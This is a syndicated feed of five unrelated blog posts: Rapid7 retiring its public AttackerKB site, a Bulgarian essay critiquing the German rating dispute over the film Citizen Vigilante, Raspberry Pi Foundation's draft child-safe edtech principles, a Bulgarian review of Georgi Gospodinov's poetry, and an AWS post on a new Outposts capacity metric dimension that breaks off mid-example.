Sunsetting the Public AttackerKB Platform

Post Syndicated from Douglas McKee, Director, Vulnerability Intelligence original https://www.rapid7.com/blog/post/ve-sunsetting-public-attackerkb-platform

What’s changing, where AttackerKB-style analysis will live, and how users can continue finding Rapid7 vulnerability intelligence.

On August 18, Rapid7 will sunset the standalone public AttackerKB website as part of a broader effort to unify our vulnerability intelligence, exploit analysis, and research resources.

Security practitioners, researchers, vulnerability managers, and current AttackerKB API users will still be able to find Rapid7 vulnerability intelligence through the Rapid7 blog, the recently revamped Rapid7 Vulnerability and Exploit Database, and customer-specific API experiences, where applicable.

The public AttackerKB platform is going away, but the intelligence and analysis that security teams rely on are not disappearing. Instead, they’re moving into experiences more closely connected with Rapid7’s broader research and vulnerability intelligence ecosystem.

What’s changing

  • The public AttackerKB website will be retired on August 18.

  • AttackerKB-style Rapid7 technical write-ups will continue on the Rapid7 blog.

  • Vulnerability intelligence will remain connected to the Rapid7 Vulnerability and Exploit Database.

  • Open community contributions and the current public AttackerKB API will be retired.

Where AttackerKB-style content will live

After the AttackerKB site is retired, that particular style of technical write-up will continue to be published through the Rapid7 blog, and will remain connected to the Rapid7 Vulnerability and Exploit Database. 

This approach brings vulnerability analysis, exploit intelligence, and security research into a more centralized experience for anyone and everyone who accesses the current standalone site. For security practitioners, researchers, and vulnerability managers, the goal is simple: Make it easier to find the information you need without moving between separate platforms.

Why we’re retiring community contributions

We’re also retiring the open community contribution model of AttackerKB. This decision enables Rapid7 to maintain tighter control over the quality and accuracy of the intelligence we publish. By moving to a more curated model, we can ensure users receive high-fidelity, verified vulnerability intelligence backed by our expert research teams.

The change helps protect and fortify the integrity of the intelligence associated with Rapid7, by reducing the risk of inaccurate submissions (especially hastily AI-generated ones), and attempts to manipulate vulnerability information. Maintaining trust in security data is what matters here, and this next step means we can continue delivering intelligence practitioners can use with confidence.

What AttackerKB API users should know

The current public AttackerKB API will be retired alongside the public platform and community features.

Going forward, access to this vulnerability intelligence through APIs will be restructured as a dedicated capability for Rapid7 customers. If your organization currently depends on the public AttackerKB API, Rapid7 will share customer-specific guidance on available options, timing, and transition details.

Next steps for AttackerKB users

If you currently use AttackerKB, here are the quick-hits for August 18 and onwards:

  • Visit the Rapid7 blog for new technical write-ups and vulnerability analysis.

  • Look for a dedicated “Technical Analysis” (linked above) tag to help make AttackerKB-style content and legacy write-ups easier to find.

  • The AttackerKB domain will automatically redirect to the Rapid7 Vulnerability and Exploit Database.

  • Use the Vulnerability and Exploit Database as your central source for vulnerability intelligence moving forward.

AttackerKB has played an important role in helping security teams understand risk and prioritize action. We’re grateful to everyone who contributed, shared knowledge, and helped shape the platform over the years, and we’re excited to deliver the same trusted intelligence through a more unified experience.

Забранен или не точно? Филмът отмъстител

Post Syndicated from Светла Енчева original https://www.toest.bg/zabranen-ili-ne-tochno-filmut-otmustitel/

Забранен или не точно? Филмът отмъстител

Тревата винаги е по-зелена от другата страна, гласи стара английска поговорка, изразяваща разпространената нагласа, че чуждото е по-хубаво от нашето. С възприятието на цензурата нещата стоят по-скоро по обратния начин – налагащите цензура обикновено са другите, докато ние сме борци за свободата на изразяване. Освен когато искаме да „предпазим“ обществото или определени групи от него (например децата). А кое е легитимна проява на свободата на изразяване и кое – злоупотреба с нея, е въпрос на ценности. Освен, разбира се, когато е резултат от политически, корпоративни или други зависимости.

До ценности опират и споровете около наложените в Германия ограничения на новия филм на немския режисьор Уве Бол Citizen Vigilante. Но за него – след малко.

В началото на юли 2026 г. в България също избухна скандал заради филм.

Половинчасовото произведение, озаглавено „Да бъдем себе си“, не е гледал почти никой. Но според политици от „Възраждане“, които подемат кампания срещу филма, той нарушава Закона за предучилищното и училищното образование. По-точно инициираната от партията поправка, забраняваща т.нар. ЛГБТ пропаганда. Защото кадрите са снимани в Немската гимназия, сред статистите са ученици и от друго училище, а сюжетът е за тийнейджър, който осъзнава, че е гей. Според депутатката от „Да, България“ Елисавета Белобрадова, чиято партия оттегли предложението си за отмяна на поправката на „Възраждане“ за пропагандата, това е

един „мъртъв“ текст, касаещ измислен и несъществуващ проблем.

Ала независимо дали проблемът е несъществуващ, текстът очевидно си е жив. Някой мислил ли е сериозно, че щом една поправка в духа на руското законодателство е влязла в закона, вносителите ѝ няма да се опитват да я прилагат?

Що за филм е Citizen Vigilante?

Да се върнем на новия филм на Уве Бол. На български заглавието Citizen Vigilante се среща като „Гражданинът отмъстител“, но може би е по-коректно то да се преведе като „Саморазправящият се гражданин“. Защото vigilante означава точно това – някой, който раздава правосъдие на своя глава вместо институциите.

Такъв е и Майкъл Сандърс, героят на Арми Хамър – американец, бивш военен, заселил се в неназована европейска държава.

Там имигрантите от ислямски страни са се превърнали в напаст – те по подразбиране са нелегални, колят и изнасилват жени и момичета, не си плащат наема на квартирата. Институциите са вдигнали ръце, защото са твърде толерантни. Съдия например оправдава шестима изнасилвачи на тийнейджърка с аргумента, че те самите са жертви на обществото, затрудняващо тяхната интеграция.

Сандърс взема правосъдието в свои ръце – избива не само виновните имигранти (сцените на убийство се показват във филма натуралистично и с много кръв), а и семейството на един от тях, включително жена и деца. Също и представители на институции – например съдията, за когото стана дума.

Тук съм, за да ви помогна да си върнете контрола,

заявява героят на Хамър, възпроизвеждайки злополучния лозунг на Брекзит „Да си върнем контрола“. Той нарежда на разследващия го шеф на Интерпол да предаде на правителството, че обществото няма да толерира т.нар. уок левица и ислямските екстремисти, които ще унищожат демокрацията. Ръководителят на Интерпол се превръща в ретранслатор на посланията на Сандърс, който успява да разпространи видео, съдържащо посланието, че ще продължи да се саморазправя, докато гражданите не се научат да се защитават.

Иронично, героят на Сандърс също е имигрант.

И също нарушава закона, макар и в името на справедливостта – така, както я разбира. Той раздава правосъдие от името на местните, които, чудно защо, също като него говорят английски. Само че с акцент, което някак неявно внушава, че те са чужденците, а не протагонистът.

Под „чужденци“ те имат предвид арабите.

Така коментира преди години тунизийски студент в Берлин наблюдението ми, че български имигранти в Германия се оплакват как страната се е „напълнила с чужденци“, без да отчитат, че и те са такива. Според героя на Арми Хамър, изглежда, всеки извършител на престъпление от мюсюлманска страна е ислямист, независимо дали религията е била мотив за престъплението, както и дали изобщо е вярващ.

Електоралната енигма – защо българите в чужбина гласуват за „Възраждане“

За пореден път след поредните избори се чудим защо българите в чужбина – тази тъй митологизирана група хора – гласуват за „Възраждане“. Марина Лякова прави анализ кои са българите в чужбина, които реално гласуват, и когато го правят, защо вотът им изглежда тъкмо по този начин.

Европейска страна като тази от филма няма.

Тази измислена държава всъщност изобразява представите за Европа на последователите на MAGA (републиканците, последователи на Тръмп), както и на крайнодесните в Европа (например „Алтернатива за Германия“), според които виновниците за несгодите им винаги са другите, чуждите, а не те самите.

Затова според тях европейците трябва да разполагат с нещо като Втората поправка в американската Конституция – да имат право да се защитават с оръжие. Друг е въпросът, че и в САЩ човек не може безнаказано да отнема живота на всеки, когото смята за лош.

Експлоатирайки клишета като „те изнасилват и убиват нашите жени и дъщери“, „ние трябва да защитим жените и дъщерите си“, филмът не само проповядва ксенофобия, ислямофобия и насилие. Той смита под килима теми като домашното насилие и сексуалното насилие, извършвано от съграждани, близки, познати, членове на семейството. Помните ли историята на Жизел Пелико?

Нейното тяло – негов избор. Какво ни казва историята на Жизел Пелико

Случаят на Жизел Пелико няма да бъде забравен не само заради чудовищния си мащаб и дързост, а и заради факта, че показва една проста истина – насилието е банално и обикновено идва от тези, които са най-близо до теб. Коментар на Светла Енчева.

Казусът със Citizen Vigilante в Германия

В Германия организацията, която поставя възрастови ограничения на филми по силата на Закона за защита на младежта, е известна като FSK (Freiwillige Selbstkontrolle der Filmwirtschaft – „Доброволна саморегулация на филмовата индустрия“). За филми, за които прецени, че съдържат сериозна опасност за обществото и/или е възможно сами по себе си да представляват престъпление, FSK може да откаже да им даде рейтинг. От това следва, че разпространението на такъв филм ще е много трудно, макар и на теория възможно. Той няма да може да се рекламира, а кината, които го прожектират, може да попаднат под ударите на закона, ако съдът реши, че филмът нарушава Наказателния кодекс.

Първо действие: две блокиращи решения и скандал

Два пъти поред FSK отказва да предостави рейтинг на Citizen Vigilante – както за кината, така и за онлайн платформите. Реакцията трудно би могла да е друга в страна, в която поколения наред са възпитавани в осъзнаване на историческата вина на държавата си за Холокоста и в нетърпимост към ксенофобията и престъпленията от омраза. Това означава, че филмът би могъл да бъде конфискуван от съд по силата на германския Наказателен кодекс, който определя като престъпление възхваляването и омаловажаването на жестоки и нечовешки актове на насилие, както и производството, притежанието, предлагането и рекламирането на подобно съдържание.

Очаквано Уве Бол обвинява организацията в цензура. Според него решението ѝ е политически мотивирано, а за разлика от отказа от рейтинг, маркирането на филма с 18+ би гарантирало защитата на непълнолетните, без да блокира разпространението на филма.

Историята стига до Илън Мъск, който неведнъж е заявявал, че е привърженик на абсолютната свобода на словото. Той публикува за 48 часа линк към филма в акаунта си в притежаваната от него социална мрежа X. Макар технически Citizen Vigilante да не е забранен, булевардни и симпатизиращи на крайнодесния популизъм медии, като например германския таблоид Bild, говорят за „забрана“.

Как е възможно хомосексуална жена да е начело на „Алтернатива за Германия“

В случай че някой се чуди как точно се връзва личността на Алис Вайдел с посоката и позициите на партията ѝ, Светла Енчева дава някои много интересни отговори. И не, „Алтернатива за Германия“ не е германското „Възраждане“, защото радикализацията там върви по съвсем друга линия.

Самият Мъск впрочем съвсем не е последователен в защитата на свободата на словото, колкото твърди, че е. Той е премахвал например акаунтите в X на журналисти и коментатори, критични към Тръмп, както и на профила @ElonJet, проследяващ частните му полети. Давал е под съд организация, според която той допуска излъчването на реклами, включващи реч на омразата. Също така Мъск не приема свободата на самоизразяване на собствената си трансджендър дъщеря, чиято полова идентичност не приема. Той смята, че „синът“ му е „убит“ от „вируса на уок ума“, и е цензурирал в X акаунти само защото използват думи като „цисджендър“.

У нас ограничението на Citizen Vigilante в Германия също се възприема като забрана, без обаче тази дума да е свързана непременно с отрицателна оценка. Селекционерът на „Киномания“ Христо Христозов определя в разговор с Васил Христов в „Извън ефир“ решението на FSK като оправдано.

Второ действие: компромисно решение на FSK

След двата отказа за определяне на рейтинг компанията FreeWind Media, която е дистрибутор на Citizen Vigilante за Германия, подава трето искане, но този път – единствено за киноразпространението, не и за стрийминг платформите. И блокадата се пропуква – на 6 юли филмът получава рейтинг 18+, което означава, че може да бъде прожектиран в кината, макар и само за пълнолетни.

Ден по-късно FSK внася уточнение в решението си, че то не се отнася за сектора на домашните развлечения, тоест за стрийминг платформите (или други форми на разпространение за гледане на компютър или по телевизията). Основанието е, че филмът включва сцени на насилие и представя саморазправата като легитимно средство за борба с престъпността и може да повлияе на младежите. А тъй като за непълнолетните гледането на филм вкъщи е по-лесно осъществимо, отколкото на кино, където има контрол на входа, прагът на изискванията за рейтинг е по-нисък.

В решението на FSK се подчертава, че липсата на рейтинг в сектора на домашните развлечения не е равносилна на забрана. Филми без рейтинг може да бъдат пускани по кината и в стрийминг платформите, както и продавани на физически носители, но само на пълнолетни. И на риска на доставчиците.

Няколко финала

Навремето работех в един университет с кинооператора Христо Тотев. В общуването ми с него ме беше впечатлила способността му да анализира филми, разказвайки ги в четири-пет изречения. На един филм му беше намерил четири финала. Сещам се за това, защото ми хрумват няколко заключения на този текст.

Първи финал

Въпреки предоставянето на рейтинг 18+, до редакционното приключване на статията липсва информация за пускането на Citizen Vigilante по германските кина. Възможно е правните спорове около филма да са направили собствениците на повечето киносалони по-предпазливи. Включването на филма в програмата им би могло да се интерпретира и като политическа позиция, с каквато в Германия не е проява на добър вкус да се ангажираш, освен ако си крайнодесен. Допускам, че филмът ще се излъчва на някои места, посещавани от последователи на „Алтернатива за Германия“ и „Гражданите на райха“.

Възходът на крайната десница в Германия – как и защо?

Тайна сбирка на дяснорадикални лидери, на която се е обсъждала „ремиграция“, стана причината за многохилядни протести в Германия. Защо дясната реторика и формации като „Алтернатива за Германия“ стават все по-силни? От Марина Лякова.

Втори финал

И без да броим последния му филм Citizen Vigilante, Уве Бол не е известен като добър режисьор. Дори напротив – носи му се славата на „най-лошия режисьор в света“. Негови филми многократно са номинирани, че и удостоявани с приза за лошо кино „Златната малина“. През 2006 г. той кани критиците си да премерят сили на боксовия ринг. Отзовават се петима. Бол печели и петте мача, понеже е тренирал бокс.

Дори Арми Хамър, изиграл главния герой в Citizen Vigilante, не защитава филма и режисьора му. Той оправдава участието си с изолацията, споходила го, след като беше кенсълнат заради обвинения в сексуално насилие и закани за канибализъм към негови партньорки. Те не бяха доказани в съда, но съмненията останаха. „Бих правил и реклама за котешка храна“, оправдава той участието си във филма на Бол, който е първото предложение след кенсълването му.

Както го е подкарал, току-виж Хамър действително стигне до реклами за котешка храна. А на онези, които го помним най-вече с участието му във филма на Лука Гуаданино „Призови ме с твоето име“, ни остава да въздъхнем носталгично.

Трети финал

Пиша тези редове в Германия. В деня, след като научих за драмите около Citizen Vigilante, на вратата се звънна. Беше съседът от Ирак – дребничък човек на средна възраст, с брада и дяволита усмивка. Държеше щайгичка, пълна с плодове и зеленчуци. Каза, че са за нас. „Бях на пазар и взех много неща. Тези не ми трябват.“ На въпроса на приятелката ми колко му дължим, отговори: „Нищо.“ Така се сдобихме с няколко килограма картофи, към кило лимони, няколко десетки чери доматчета на клонки, две големи краставици и една салата айсберг.

Да са разпространени подобни жестове в Германия – не са. Да ни е близък съседът иракчанин – не е. Замислих се по този повод, че тъкмо такива като този съсед – имигранти от мюсюлмански страни – избива героят на Арми Хамър. Е, нашият съсед вероятно не е нелегален, а и не сме чули да не си плаща наема. Работи като нощен пазач в библиотека. Но Сандърс не иска да му се представят лични документи, разрешения за работа и договори за наем, преди да открие огън. Такава е логиката на престъпленията от омраза – всички представители на определена група се смятат за виновни за прегрешенията на отделни нейни членове.

Край.

Building education technology that children can trust

Post Syndicated from Laura Kirsop original https://www.raspberrypi.org/blog/draft-principles-for-safe-responsible-edtech/

Millions of young people and educators around the world use our technology to teach, learn, and create with code. Building it safely and responsibly is intrinsic to who we are and what we stand for.

A young person presents her code on a large screen.
A young person presents code she has written in our Code Editor.

A growing body of research and public commentary links the use of social media, smartphones, and algorithmic platforms to declining mental health and attention in young people. Public attitudes are shifting in response, and parents, teachers, and governments are increasingly demanding action. Phone bans in schools and restrictions on social media are spreading across many countries. The technology sector can no longer take public trust for granted.

None of this is new territory for researchers, who have argued for decades that technology is not neutral, and that the choices made in designing it can either embed harm or help prevent it (1). We think this moment calls for a calm, evidence-led response, and we want to be open about how we are approaching it and to do this work alongside others rather than on our own.

Standing on existing research

We have always been a research-led organisation. When we face a difficult question, we look at the evidence and learn from the people who have studied it.

A person on stage stands before a slide with the sentence "We can build technology that helps children learn and thrive".
Laura Kirsop presented the draft principles at the Raspberry Fields summit in July.

Children’s digital rights is a rich and well-established field. Researchers and experts have spent years thinking carefully about what children need from the technology they use, and how their rights apply in a digital world. The United Nations set out a clear framework in 2021 with General Comment No. 25, which describes how children’s rights apply to the digital environment. Organisations like UNICEF and the 5Rights Foundation have built on this with practical guidance for the people who design and build products.

This body of work gives us firm ground to stand on. Rather than starting from scratch, we have used it to shape our own approach. We have drawn in particular on UNICEF’s Responsible Innovation in Technology for Children framework, UNICEF’s EdTech for Good Framework 1.0, the UN’s General Comment No. 25, and the Digital Futures Commission’s Child Rights by Design principles.

Eight principles to guide our work on edtech

We have begun by writing eight principles, designed to guide the decisions we make as we build and run our products.

Our principles:

1. The best interests of the child come first. We design for children’s wellbeing, which means more than safety and privacy. It includes their agency, their emotional health, their relationships, and the space to create. Sometimes putting that first means choosing against growth, engagement, or speed.

2. Our technology supports human relationships. It does not replace them. Any personalised or AI-supported features we build are there to strengthen the relationships between young people, educators, and caregivers. People stay in control, and we do not hand decisions about a child’s learning or wellbeing to a machine.

3. We only collect the data we need. By the time a child turns 13, more than 72 million pieces of personal data will have been collected about them. We collect the minimum we need to help children learn and to measure our impact. We do not sell data, and we never will.

4. We design for learning, and we prove its impact. Our products are grounded in evidence about how children learn, and we evaluate whether they actually work. We avoid designs that keep learners hooked rather than helping them learn.

5. We design with children and educators, not for them. The people who use our products are the experts on their own needs. We involve them in research, testing, and feedback, and we make sure what they tell us shapes the product, not just a report at the end.

6. We design for diverse needs, abilities, and contexts. Our technology adapts to people, not the other way around. We do not assume constant connectivity, confidence with digital technologies, or a classroom that looks like anyone else’s.

7. We are transparent and accountable. We use plain language to explain how our products work, how data is used, and what rights people have. And we give people clear ways to question or challenge the decisions our systems make.

8. We apply the highest standards of children’s rights everywhere we work. Where local rules fall short of international best practice, we choose the higher standard. A child’s rights should not depend on where they happen to live.

You can read the full set of draft principles, and the research behind each one, in this PDF:

Committed, not perfect

Publishing these principles is a statement of intent, not a claim that we have got everything right. This is a fast-moving area. Regulation is changing quickly, the research keeps developing, and we grow and change our own products. There are areas where we know we have work to do, and almost certainly areas we have not yet spotted.

These principles are how we hold ourselves to account, and they are only a start. Alongside them, we are mapping the regulatory landscape across the countries where we work, developing ways to assess our products against these principles, and building these commitments into how we make decisions. We will keep listening to the people who use our products, and making sure children themselves have a voice in shaping the technology built for them.

We also know we cannot do this alone, so we have two asks for you:

If you have a view on these principles, tell us. Whether you are a researcher, educator, parent, young person, or policymaker, we want to hear where you think we have got it right, where we have not, and what we have missed. Honest challenge is genuinely useful to us. Give your feedback and sign up to be involved in shaping them.

If you are part of a non-profit or organisation working on similar questions, get in touch. We would like to build a coalition of like-minded organisations to share what we are learning and raise standards across the sector.


(1) See for example:

  • Friedman, B., & Nissenbaum, H. (1996). Bias in computer systems. ACM Transactions on Information Systems, 14(3), 330–347. https://doi.org/10.1145/230538.230561
  • Noble, S. U. (2018). Algorithms of Oppression: How Search Engines Reinforce Racism. NYU Press.
  • O’Neil, C. (2016). Weapons of Math Destruction: How Big Data Increases Inequality and Threatens Democracy. Crown.

The post Building education technology that children can trust appeared first on Raspberry Pi Foundation.

На второ четене: „Черешата на един народ“

Post Syndicated from Стефан Иванов original https://www.toest.bg/na-vtoro-chetene-chereshata-na-edin-narod/

„Черешата на един народ“ от Георги Господинов

На второ четене: „Черешата на един народ“

Пловдив: изд. „Жанет 45“, 1996, 2026

Има нещо дълбоко господиновско във факта, че „Черешата на един народ“ се преиздава точно в годината, в която по площадите ще гърмят възстановки на черешови топчета за 150-годишнината от Априлското въстание. Историята, която книгата от 1996-та описва като вечно отлагано събитие, услужливо е доставила декора. Юбилейни залпове за нещо, което по вътрешната логика на самата книга така и не се е случило докрай.

И тази година, дядовото, няма да има априлско въстание

Стихът се оказва с неограничен срок на годност – като компот, забравен в мазето на националното съзнание.

Юбилейното издание прави още един жест, прибирайки в тялото на книгата собствената ѝ рецепция. Така критическите прочити на Светлозар Игов, Албена Хранова, Бойко Пенчев, Пламен Антов и Биляна Курташева вече са част от корпуса, както бележките под линия у Борхес са част от разказа. Книгата пристига при новия читател предварително коментирана, като ръкопис с глоси по полетата, и това е формален аргумент.

„Черешата“ винаги е твърдяла, че българското съществува преди всичко като текст върху текст, и сега тя демонстрира палимпсеста със собственото си тяло.

Светлозар Игов пръв формулира централната категория на несбъднатото и я обръща във философска теза, защото „всяка история е история на несбъднатости. Ако историята можеше да се сбъдва, нямаше да има история.“ Тезата има славно родословие. Музил нарича същото Möglichkeitssinn, усет за възможното. Неговата Какания и черешовата България са братовчедки, държави на генералната репетиция без премиера. Кавафисовите варвари, чието вечно неидване организира живота по-надеждно от всяко идване („тези хора бяха все пак някакво решение“), и Бекетовият Годо, за когото всеки ден пристига известие, че днес няма да дойде, но утре непременно, са задочните роднини на априлското въстание, което всяка пролет е възможно и всяка пролет се отлага в полза на компота. Разликата е климатична. При Бекет дървото е голо, при Господинов е отрупано с цвят.

Българското несбъдване е плодородно. Ражда сладко, ракия, лютеница, литература.

Игов настоява, че поезията е мястото, където историята единствено може да се сбъдне, и в тази светлина „Черешата“ е парадоксално оптимистична книга и гърмежът е пренесен от цевта в езика.

Заглавната метафора крие цяла литературна геополитика. От едната страна стоят Вазов и черешовото топче, и градината като арсенал, а от другата са Чехов и вишневата градина, и красотата, изсичана от новото време. Господинов застава по средата и иронизира двупосочно. Неговата череша нито гърми, нито бива изсечена. Тя ражда компоти. Хранова показва механиката с хирургическа точност. Вазовият език на бунта е наложен върху всекидневието, без да може да го промени. Настоящето умее единствено да рецитира наизустената класика. Това е операция от типа на Борхесовия Пиер Менар, защото, да, „Делото ще пламне и начаса всякой / ще вземе участье в това предприятье“, да, думите са автентични, ситуацията е компотена, смисълът се е обърнал, без нито една буква да е предадена. И най-фината подробност – свалената главна буква на „априлско въстание“ връща историческото понятие в регистъра на сезонните повторения. Единствено децата поддържат бунтовната образност, детството е като последен резерват на историческото въображение – теза, която авторът ще разгърне след години във „Физика на тъгата“.

Пламен Антов дава най-концептуалната формула и я нарича „дядо-ми-в-мен“. Българският постмодернизъм на 90-те подменя Лакановото „име на Бащата“ с името на Дядото. Освобождаването от бащината инстанция върви ръка за ръка със сантиментално отношение към прародителя. Дядото, който никога не е виждал море, милее за Босфора от песента. Внукът милее за дядовото милеене. Носталгията тук е втора производна, копнеж по чуждия копнеж. Световната литература познава фигурата добре. Полковник Аурелиано Буендия със златните рибки, които претопява, за да ги направи наново, е латиноамериканският еквивалент на дядото с несъстоялото се топче. Това е героика, рециклирана в цикличен занаят. А „Първи стъпки“, където селският клозет се оказва пряк вход към тартара, е шулцовска митологизация на двора, издържана с онази сериозност, която единствена прави иронията възможна.

Курташева посочва домашния първоизточник. Още Пенчо Славейков знае, че съчиняването на своето поколение минава през измислянето на предците. В „Родства по избор“ авторът сам изважда в новия предговор Гьотевата формула, пренесена от химията на брака в химията на традицията с „език на дядо Уитман и на дядо ми“, с „на татко Елиът и на баща ми“ (с „познанството им твърде бегло“, един от най-елегантните автоиронични стихове на 90-те). Дикинсън и селската баба на една трапеза е фамилна снимка, за която българската поезия дотогава нямаше техническата смелост.

Бойко Пенчев дефинира носталгията на Господинов като „носталгия по съредността на думите и нещата“ по време, в което думите са имали плът, вкус и мирис. Намекът към Фуко е обявен от самия Пенчев за банализиран, но истинският подтекст е Еко: „от някогашната роза остана само името“ перифразира финала на „Името на розата“, а „За вкуса на имената“ го разиграва буквално и от „Роза Бяла“ остава само името, което е по-вкусно от пастата, а при дòсега с рецептата Бьоф Строганов се разпада до говеждо с картофи. Ема Бовари умира от несъответствието между албуми със снимки и Париж, а героите на Господинов познават Айфеловата кула като сувенир с термометър и оцеляват, защото никога не стигат до оригинала. Бодрияр е цитиран в текста откъм кухнята, където соцбитът е изпреварил френската теория с десетилетия. Цяла държава живя сред копия без оригинали и нарече това обща култура.

На второ четене: „Черешата на един народ“

На „Тайните вечери на езика“ Хранова посвещава страници, които сами са малка класика. В роднинската редица на езика липсва „майчин език“, защото майката е притежавана от езика, преди да го притежава, тя се появява само като зов, „мааать – mat – мааать“, звук отпреди Вавилон. Езикът въобще е „нещо голямо и нечовешко като пчелата-майка с роя“. Авторът очевидно помни и в предговора от 2026-та троловете оспорват „правото на пчелата майка на езика“, метафората на Хранова се е върнала в авторския речник, кръгът поезия–критика се е затворил. Другите две езикови лаборатории на книгата допълват картината. „Техниката за обезкостяване“, при която Дебеляновото „Помниш ли, помниш ли“ се свежда до „о и и, о и и“, плува в едни води с Хлебниковия заум и Моргенщерновата „Нощна песен на рибата“, само че с обратен темперамент. Авангардът обезкостяваше езика с манифестен патос, а Господинов го прави с нежност, като баба, която чисти риба за внука. А „Да попушим Пушкин“ довежда Манделщамовия „краден въздух“ до физиологичния му предел. Духът на поезията е Дим, четенето става причастие в най-буквалния и канибалски смисъл, а изгарянето е върховна форма на прочит, обърнат Бредбъри. И тук е забито най-болезненото изречение в книгата:

защо не можем да имаме лична история, без тя да бъде тъкмо българската.

Цялата източноевропейска литература на ХХ век е коментар под него.

Вторият цикъл има за герой едно отсъствие. Българските 60-те, които „никога не са се състояли“. Докато Прага гори, Ямбол консервира. Революцията на цветята ври в лютеницата заедно със стъкления лук на „Бийтълс“. Кундера построи „Книга за смеха и забравата“ върху организираното забравяне на чешката 68-ма. Господинов пише за по-коварното, за носталгия по непреживяно събитие, спомен втора употреба, което Светлана Бойм би нарекла „рефлексивна носталгия“, копнеж, който знае за невъзможността си и от това знание се храни. „Girl“ (Курташева отбелязва, че стихотворението „може да се казва и СПИН“) подрежда телата във верига по образеца на Шницлеровия „Хоровод“ – „Ах колко общество в едно момиче“. Игов вижда „промискуитетното братство“ на консумацията с изпреварилото дебатите уточнение, че една феминистка би обърнала стихотворението в „Boy“ без загуба на внушение. „Умирам по Пастернак“ полага „Зимна нощ“ в сцена с пиян съсед и легло, минаващо „в анапест“ – пародията като форма на вярност. А финалното „За леката душа“ е българският Иван Илич, животът „най-обикновен и затова най-ужасен“, разказан без Толстоевия метафизичен вопъл, с изсулване вместо агония, „няма даже драма / няма нищо после / нищо няма / няма“. Игов задава върху него въпроса на въпросите, като пита

дали историята-нищо създава хора-нищо, или е обратното, и трийсет години по-късно въпросът стои все така неудобен, което вероятно значи, че е зададен правилно.

Новият предговор изрично кани към сравнение между двата края на дъгата и резултатите са двусмислени. На повърхността всичко се е сбъднало, дядовият Босфор е дестинация на нискотарифни авиолинии, „Европа квартална“ от първи януари дели с нас и валутата си, границите от „Зоо на географията“ са разтворени в Шенген. Книгата обаче е за друго. За това, че сбъдването по каталог е фалшиво сбъдване. Достъпният Босфор оставя дядовата тъга без наследник, а носталгията сменя адреса си – днес се носталгира по самите 90-те, по „мрежата от смисли и жужащи гласове“, която предговорът оплаква. Несбъднатото е пропълзяло едно поколение напред, точно както стихотворението предсказваше, че ще „трупа исторически дефицити за нашите деца“.

Под повърхността приликите са по-мрачни. Мизерната 1996-та и днешното „усещане за катастрофа (в града и в света)“ авторът свързва в „едно пълзящо отчаяние“. Между двете дати се редят януари 97-ма, протестите на 2013-та и 2020-та, поредица „априлски ставания“, за всяко от които легендата към второто издание е написала епикризата, че „нито някой знае дали онова наистина се случи докрай“. Междувременно самата дума „Възраждане“, на която книгата правеше своето „йе-йе-йе“, днес е регистрирана политическа марка с парламентарна група. За съжаление, пред професионализма на историята иронията на поета изглежда като безсилна добронамереност. А „смисловият кит, върху чийто гръб се крепеше литературната ни вселена“, по диагнозата на предговора „се е буквализирал в плоска конспиративна теория“. Там, където иронията се чете буквално, а буквалното като заговор, постмодерната игра губи партньора си. И географията се завърна без чувство за хумор. Броилката „оттам ще ни застрелят“ през 1996-та беше детска геополитическа параноя – днес, с война на два дни път с кола, се чете със свито гърло.

Най-тихото мерило дава „Бащината къща“. През 1996-та смокът под прага беше елегия за умиращото село. Днес къщата е или погълната от къпините, или ремонтирана по европейска програма в къща за гости с джакузи. Трудно е да се каже кой вариант е по-меланхоличен. Лютеницата се продава в бурканчета „като едно време“ и носталгията, за която Пенчев писа като за екзистенциална категория, е усвоена от търговията на дребно. Компотът победи по всички линии. Въстанието не се яви и на този кръг.

„Чети бавно!“, нарежда мотото на „Много бавен страх“ и Курташева превърна повелята в метод, с намигване към Кундеровата „Бавност“. Бавността се оказа вярната стратегия.

Книга, замислена като снимка на 90-те, се чете през 2026-та с непредвидена острота, защото несбъднатото, за разлика от сбъднатото, има неограничен срок на годност.

Игов завършва рецензията си с изречението, че книгата, потопена в историчността, „не е исторична. Тя е Поезия“, и това се потвърди емпирично. Историчното от 1996-та остаря, но поезията – не. А дървото, да си припомним, първо цъфти в бяло, после зеленее и накрая дава червено. Националното дърво на българите изпълнява трикольора по чисто ботанически път, без въстание, юбилей и възстановки. Достатъчно е да не го поливаш с гореща вода. И да четеш бавно.


Никой от нас не чете единствено най-новите книги. Тогава защо само за тях се пише? „На второ четене“ е рубрика, в която отваряме списъците с книги, публикувани преди поне година, четем ги и препоръчваме любимите си от тях. За нея медията „Тоест“ е отличена с Националната награда „Христо Г. Данов“ (2025) за принос в представянето на българската книга.

Рубриката е част от партньорската програма Читателски клуб „Тоест“, благодарение на която активните дарители на „Тоест“ получават 20% отстъпка от коричната цена на всички книги на включените издателства. Изборът на заглавия обаче е единствено на авторите Стефан Иванов, Севда Семер и Антония Апостолова, които биха ви препоръчали тези книги и ако имаше как да се разходите с тях в книжарницата. 

New: Enhanced AssetState dimension for AWS Outposts capacity metrics on Amazon CloudWatch

Post Syndicated from Rachel McElwaine original https://aws.amazon.com/blogs/compute/new-enhanced-assetstate-dimension-for-aws-outposts-capacity-metrics-on-amazon-cloudwatch/

Today, we are releasing an expanded format of our Amazon CloudWatch dimensions for AWS Outposts capacity metrics. The existing CloudWatch metrics, AvailableInstanceType_Count, UsedInstanceType_Count, InstanceTypeCapacityAvailability, and InstanceTypeCapacityUtilization for Outposts, can now be grouped using the new AssetState dimension with values: Active, Isolated, or Retiring. In this post, we describe what’s changing and how you can use this dimension to improve your capacity monitoring.

What’s changing

Previously, an Outpost could be moved to one of these asset states following an AWS maintenance action, either by an on-site visit or by a remote network update. These state transitions are triggered by control plane operations and previously were not surfaced in customer-facing metrics. This could lead to incorrect or misleading capacity counts.

With this enhancement, you can group the metrics by the dimension to distinguish capacity between production-ready resources and capacity temporarily offline for maintenance.

Introducing the new AssetState dimension

This new dimension adds more visibility into the state of your first-generation and second-generation Outpost racks and servers. The values show the internal state of the AWS Outposts hardware and describe the current working state of the Outpost. These new values are:

  • ACTIVE – The Outpost is production-ready and can launch instances.
  • ISOLATED – The server or asset within the Outpost was taken offline and is temporarily unavailable.
  • RETIRING – The compute asset is not available for use. This state is used when a replacement part is needed.

The new AssetState dimension can be used for creating Amazon CloudWatch alarms for better monitoring, visibility, and alerting of AWS Outposts capacity.

Example metrics output

5 Server/Assets: 4 Active, 1 Isolated, 3 Active used, 1 Isolated used:

AvailableInstanceType_Count | i3en.metal-2tb | count = 1
AvailableInstanceType_Count | i3en.metal-2tb | ACTIVE | count = 1
AvailableInstanceType_Count | i3en.metal-2tb | ISOLATED | count = 0
